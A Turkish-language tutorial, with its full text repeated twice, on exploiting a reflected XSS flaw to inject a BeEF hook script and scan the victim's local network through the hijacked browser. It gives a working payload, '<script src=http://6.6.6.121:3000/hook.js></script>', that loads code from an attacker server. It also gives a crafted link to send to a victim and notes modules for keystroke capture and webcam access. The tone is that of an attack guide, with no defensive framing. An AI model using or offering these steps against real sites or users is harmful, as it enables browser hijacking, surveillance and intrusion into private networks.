XSS Üzerinden Yerel Ağ Taraması beef (kurbanın browserından port tarama)
XSS, yani Cross Site Scripting, web uygulamalarında bulunan bir güvenlik zafiyetidir. XSS, web uygulamasında kullanıcıdan veri alınarak bunun DOM Dökümasyonuna işlendiği her yerde ortaya çıkabilir. XSS, saldırganın kurbanın tarayıcısında istediği kodu çalıştırmasına olanak tanır.
BeEF, yani Browser Exploitation Framework, XSS açıklarını kullanarak kurbanın tarayıcısını yönetmeye yarayan bir penetrasyon testi aracıdır. BeEF, kurbanın tarayıcısına bir JavaScript kodu enjekte ederek, onunla bir bağlantı kurar ve çeşitli komut modülleri göndererek kurbanın sistemi ve ağı hakkında bilgi toplar.
XSS üzerinden yerel ağ taraması yapmak için şu adımları izleyebilirsiniz:
1. Adım: XSS açığı bulunan bir web uygulaması bulun. Bu web uygulaması, kullanıcıdan veri alarak bunu sayfaya işleyen bir parametre içermelidir. Örneğin, http://www.example.com/sort_news?ID= gibi bir URL olabilir. Burada ID parametresi XSS açığına sahiptir.
2. Adım: BeEF aracını kurun ve çalıştırın. BeEF aracını https://github.com/beefproject/beef adresinden indirebilirsiniz. BeEF aracını kurmak ve çalıştırmak için https://beefproject.com/ adresindeki dokümantasyonu takip edebilirsiniz. BeEF aracını çalıştırdığınızda, bir web arayüzüne erişebilirsiniz. Bu arayüzde, BeEF tarafından üretilen bir JavaScript kodu göreceksiniz. Bu kod, http://6.6.6.121:3000/hook.js gibi bir URL şeklindedir. Bu URL, BeEF sunucunuzun IP adresi ve port numarasını içerir.
3. Adım: XSS açığı bulunan web uygulamasına BeEF JavaScript kodunu enjekte edin. Bunun için, XSS açığı bulunan parametreye <script src=http://6.6.6.121:3000/hook.js></script> gibi bir kod ekleyin. Örneğin, http://www.example.com/sort_news?ID=<script src=http://6.6.6.121:3000/hook.js></script> gibi bir URL oluşturun. Bu URL'i kurbanınıza gönderin ve onun bu adresi ziyaret etmesini sağlayın. Kurban bu adresi ziyaret ettiğinde, BeEF JavaScript kodu kurbanın tarayıcısında çalışacak ve BeEF sunucunuzla bir bağlantı kuracaktır.
4. Adım: BeEF web arayüzünde kurbanın tarayıcısını yönetin. BeEF web arayüzünde, kurbanın tarayıcısının bağlandığını göreceksiniz. Kurbanın tarayıcısına tıklayarak, ona çeşitli komut modülleri gönderebilirsiniz. Komut modülleri, kurbanın tarayıcısında çalışan JavaScript kodlarıdır. Bu kodlar, kurbanın sistemi ve ağı hakkında bilgi toplamanıza, kurbanın tarayıcısını yönlendirmenize, kurbanın klavye girişlerini yakalamanıza, kurbanın web kamerasını açmanıza ve daha birçok işlem yapmanıza olanak tanır.
5. Adım: Komut modülleri arasından Port Scanner modülünü seçin. Bu modül, kurbanın tarayıcısını kullanarak yerel ağda port taraması yapmanızı sağlar. Bu modülü seçtiğinizde, hedef IP adresi(leri) girmeniz istenecektir. Buraya, kurbanın ağındaki IP adreslerini veya IP adres bloklarını girebilirsiniz. Örneğin, 192.168.1.1 veya 192.168.1.0/24 gibi. Daha sonra, taramak istediğiniz port aralığını girebilirsiniz. Örneğin, 1-1024 gibi. Son olarak, tarama başlat butonuna basarak, port taramasını başlatabilirsiniz. Port taraması sonucunda, kurbanın ağındaki açık portları ve çalışan servisleri görebilirsiniz.
XSS, yani Cross Site Scripting, web uygulamalarında bulunan bir güvenlik zafiyetidir. XSS, web uygulamasında kullanıcıdan veri alınarak bunun DOM Dökümasyonuna işlendiği her yerde ortaya çıkabilir. XSS, saldırganın kurbanın tarayıcısında istediği kodu çalıştırmasına olanak tanır.
BeEF, yani Browser Exploitation Framework, XSS açıklarını kullanarak kurbanın tarayıcısını yönetmeye yarayan bir penetrasyon testi aracıdır. BeEF, kurbanın tarayıcısına bir JavaScript kodu enjekte ederek, onunla bir bağlantı kurar ve çeşitli komut modülleri göndererek kurbanın sistemi ve ağı hakkında bilgi toplar.
XSS üzerinden yerel ağ taraması yapmak için şu adımları izleyebilirsiniz:
1. Adım: XSS açığı bulunan bir web uygulaması bulun. Bu web uygulaması, kullanıcıdan veri alarak bunu sayfaya işleyen bir parametre içermelidir. Örneğin, http://www.example.com/sort_news?ID= gibi bir URL olabilir. Burada ID parametresi XSS açığına sahiptir.
2. Adım: BeEF aracını kurun ve çalıştırın. BeEF aracını https://github.com/beefproject/beef adresinden indirebilirsiniz. BeEF aracını kurmak ve çalıştırmak için https://beefproject.com/ adresindeki dokümantasyonu takip edebilirsiniz. BeEF aracını çalıştırdığınızda, bir web arayüzüne erişebilirsiniz. Bu arayüzde, BeEF tarafından üretilen bir JavaScript kodu göreceksiniz. Bu kod, http://6.6.6.121:3000/hook.js gibi bir URL şeklindedir. Bu URL, BeEF sunucunuzun IP adresi ve port numarasını içerir.
3. Adım: XSS açığı bulunan web uygulamasına BeEF JavaScript kodunu enjekte edin. Bunun için, XSS açığı bulunan parametreye <script src=http://6.6.6.121:3000/hook.js></script> gibi bir kod ekleyin. Örneğin, http://www.example.com/sort_news?ID=<script src=http://6.6.6.121:3000/hook.js></script> gibi bir URL oluşturun. Bu URL'i kurbanınıza gönderin ve onun bu adresi ziyaret etmesini sağlayın. Kurban bu adresi ziyaret ettiğinde, BeEF JavaScript kodu kurbanın tarayıcısında çalışacak ve BeEF sunucunuzla bir bağlantı kuracaktır.
4. Adım: BeEF web arayüzünde kurbanın tarayıcısını yönetin. BeEF web arayüzünde, kurbanın tarayıcısının bağlandığını göreceksiniz. Kurbanın tarayıcısına tıklayarak, ona çeşitli komut modülleri gönderebilirsiniz. Komut modülleri, kurbanın tarayıcısında çalışan JavaScript kodlarıdır. Bu kodlar, kurbanın sistemi ve ağı hakkında bilgi toplamanıza, kurbanın tarayıcısını yönlendirmenize, kurbanın klavye girişlerini yakalamanıza, kurbanın web kamerasını açmanıza ve daha birçok işlem yapmanıza olanak tanır.
5. Adım: Komut modülleri arasından Port Scanner modülünü seçin. Bu modül, kurbanın tarayıcısını kullanarak yerel ağda port taraması yapmanızı sağlar. Bu modülü seçtiğinizde, hedef IP adresi(leri) girmeniz istenecektir. Buraya, kurbanın ağındaki IP adreslerini veya IP adres bloklarını girebilirsiniz. Örneğin, 192.168.1.1 veya 192.168.1.0/24 gibi. Daha sonra, taramak istediğiniz port aralığını girebilirsiniz. Örneğin, 1-1024 gibi. Son olarak, tarama başlat butonuna basarak, port taramasını başlatabilirsiniz. Port taraması sonucunda, kurbanın ağındaki açık portları ve çalışan servisleri görebilirsiniz.
